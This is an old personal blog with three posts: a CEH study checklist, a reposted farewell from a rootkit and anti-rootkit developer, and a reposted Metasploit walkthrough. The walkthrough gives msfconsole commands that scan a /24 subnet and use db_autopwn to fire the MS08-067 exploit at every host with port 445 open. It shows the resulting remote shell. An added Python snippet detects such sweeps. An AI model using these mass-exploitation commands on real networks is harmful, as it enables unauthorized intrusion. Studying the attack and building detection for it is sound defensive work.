Thursday, October 22, 2009

Methodology to study

To study the CEH course you need to:

+ Share and discuss
+ Understand malware
+ Understand network systems
+ Understand network services
       - Ports
       - DNS, DHCP, DHCP Relay Agent, NAT, Port forwarding
       - ACL
       - Authentication (token, RADIUS, LDAP)
       - Find vulnerabilities
       - Remember the hacker process


Thanks to VuongTrungThang for this methodology

Wednesday, October 21, 2009

Thanks to EP_X0FF

To EP_X0FF
I know you are an expert on rootkits. I like your ideas. I will try to learn about VR/RK, networking and security. Thanks.
And I want to copy the article from your blog.


On the way to Microsoft
I was too busy during these two months to write something here or on forums. But as you can predict, currently I have enough time to write some news ;) First, we have finally dealt with all problems and now our little collective is on the way to Microsoft. That is not a joke :) Since the beginning of 2007 we have had a lot of contacts with Microsoft participants from the dev team. They were really interested in our projects (at this time it was Rootkit Unhooker and the test rootkit Unreal) and they gave us the opportunity to join their team. But all that we have done these two years was part of our big project called Secured Eye (SEye); in two words, this project is a mix of software/hardware related to distributed calculations and virtualization technologies based on Vanderpool / Pacifica extensions. Not a Blue Pill. To be more correct, some parts of SEye can be used as a pill for any kind of Blue Pill variation ;) Currently our collective is partially migrating to Wittenberg, located in Germany, where we will finish our work on SEye. As you can guess, all our source code and concepts were sold to MS. This happened in the beginning of November and includes all variants of our test programs, RkU, including the last 4.1 version, and SEye, which is 3/4 ready. But this doesn’t mean that any kind of this code / technology will be used by the corporation in commercial products in the near future. More likely not. Just remember - virtualization is the key to the future.

Finally I want to greet all the people who helped us in our little RK/ARK “Invisible War” during the last two years, a war which has successfully come to a logical end.

Greg Hoglund (thanks for the roots)
Joanna Rutkowska (you have given us a target)
Holy Father (hxdef master)
Authors of the BOOTKIT (you are cool)
Mark Russinovich (great book and great tools)
Cardmagic and wowocock (thank you guys for your tool and ideas)
Gmer (buddy, no matter what was between us, thank you for your gmer)
Fyyre (you have known us at the same starting!)
Ms-Rem (he knows for what)
j0ker (for icq sessions, money is not everything in the life, but of course awesome part)
PJF (for making IceSword all these years)
EASTER (for the outstanding support, we will not forget)
SpannerITWks (for the RK/ARK challenge and support)
fcukdat (for providing us wonderful malware samples)
Elite (for support and understanding)
saso (being with us even after KAV stories)
steo (for supporting RkU)
Zhadum (your polymorphic engines were great)
Ratter (for reversing Unreal)
Bruno Eduardo (for wonderful translations of RkU)
Mixel (for support and translations)
FlowerCode (for support and translations)
firabc (you were with us during all these crazy years)
Error_Log (you should be more independent, especially from your new friend)
Twister (real bughunter of our RkU 3x)
n0name (for several ideas)
Cr4sh (for supporting us in some situations)
sww (using your company AVs since 1994 till now)
tnt17 (for supporting us)
ad_13 (for supporting us, your thanks will be transferred)
+ all whom I have forgotten to list

In the end I would like to say a personal “no thanks” to several members of the Russian-speaking shitty virusinfo.info conference and some other idiots from different places. Your waning minds were and are too weak to understand anything ;)



Source: https://www.rootkit.com/blog.php?newsid=830

Once again, I want to say: Thank you!

Wednesday, October 7, 2009

Metasploit Mass Exploitation for Dummy

One of the features added in the 3.2 release of the Metasploit Framework was the ability to restrict the db_autopwn command to specific ports and modules matching a given regular expression. This feature can be used to run one or more exploits against a specific range of hosts at the same time.

In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.

To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.


msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3


Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:


msf > db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db


To speed up our test, we will use the db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:


msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24


Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:


msf > db_autopwn -e -p -b -m ms08_067


Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.


msf > sessions -l
Active sessions
===============

Id  Description    Tunnel
--  -----------    ------
1   Command shell  AAA.BBB.CCC.11 -> AAA.BBB.CCC.86

msf > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
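The db_nmap run above has a recognisable shape from the other side of the wire: one source sends SYNs to TCP/445 on every address of a class C within seconds, and only hosts that answer receive the MS08-067 attempt afterwards. The following is an added detection example, not code from the Metasploit blog or the Framework. It parses an assumed, simplified firewall-style log format (timestamp, SYN, source, destination) over constructed sample lines and flags any source that probes port 445 on many distinct hosts inside a short window, while leaving alone a workstation that repeatedly connects to a single file server and a source that is sweeping a port we are not watching.

```python
"""Flag sources that probe TCP/445 across many hosts in a short window.

Added example; not part of the Metasploit post. The log format and the
sample traffic below are constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed, simplified log format (constructed for this example):
#   <ISO timestamp> SYN <src_ip>:<src_port> -> <dst_ip>:<dst_port>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) SYN (?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_line(line):
    """Return (timestamp, src, dst, dport) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return (datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dport"]))


def find_port_sweeps(lines, port=445, min_hosts=10, window=timedelta(seconds=60)):
    """Return {src: (first_seen, distinct_hosts)} for every source that sent
    SYNs to `port` on at least `min_hosts` distinct hosts within any `window`.

    Repeated connections to the same host do not count: a workstation that
    talks to one SMB file server all day never trips the threshold."""
    events = defaultdict(list)  # src -> [(timestamp, dst)]
    for line in lines:
        parsed = parse_line(line)
        if parsed is None or parsed[3] != port:
            continue
        ts, src, dst, _ = parsed
        events[src].append((ts, dst))

    alerts = {}
    for src, evs in events.items():
        evs.sort()
        j = 0
        for i, (start, _) in enumerate(evs):
            # Slide j to the first event that falls outside the window
            # opening at evs[i]; j only ever moves forward.
            while j < len(evs) and evs[j][0] - start <= window:
                j += 1
            hosts = {dst for _, dst in evs[i:j]}
            if len(hosts) >= min_hosts:
                alerts[src] = (start, len(hosts))
                break  # report the earliest qualifying window per source
    return alerts


def build_sample_log():
    """Constructed sample traffic: one host sweeping 192.0.2.0/24 on 445
    (the shape of the db_nmap -PS445 -p445 run), one workstation talking to
    a single file server, one host sweeping port 80, and one junk line."""
    base = datetime(2009, 10, 7, 10, 0, 0)
    lines = []
    for n in range(1, 31):  # 30 distinct hosts on 445 within 30 seconds
        t = base + timedelta(seconds=n)
        lines.append(f"{t.isoformat()} SYN 10.0.0.5:{51000 + n} -> 192.0.2.{n}:445")
    for n in range(20):  # 20 connections, but all to one file server
        t = base + timedelta(seconds=2 * n)
        lines.append(f"{t.isoformat()} SYN 10.0.0.9:{52000 + n} -> 192.0.2.10:445")
    for n in range(1, 31):  # many hosts, but on a port we are not watching
        t = base + timedelta(seconds=n)
        lines.append(f"{t.isoformat()} SYN 10.0.0.7:{53000 + n} -> 192.0.2.{n}:80")
    lines.append("garbage line that does not parse")
    return lines


if __name__ == "__main__":
    for src, (first_seen, n_hosts) in find_port_sweeps(build_sample_log()).items():
        print(f"ALERT {src} probed TCP/445 on {n_hosts} hosts starting {first_seen}")
```

The threshold and window are deliberately parameters: a /24 sweep at Nmap's aggressive timing finishes in seconds, so a 60-second window with ten distinct hosts is generous, but the same function can be re-run with `port=80` or a tighter window against the same log to see what else is sweeping.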

Source: http://blog.metasploit.com/2009/02/metasploit-mass-exploitation-for.html

Maybe this article is only basic, but let's try it.


Enjoy!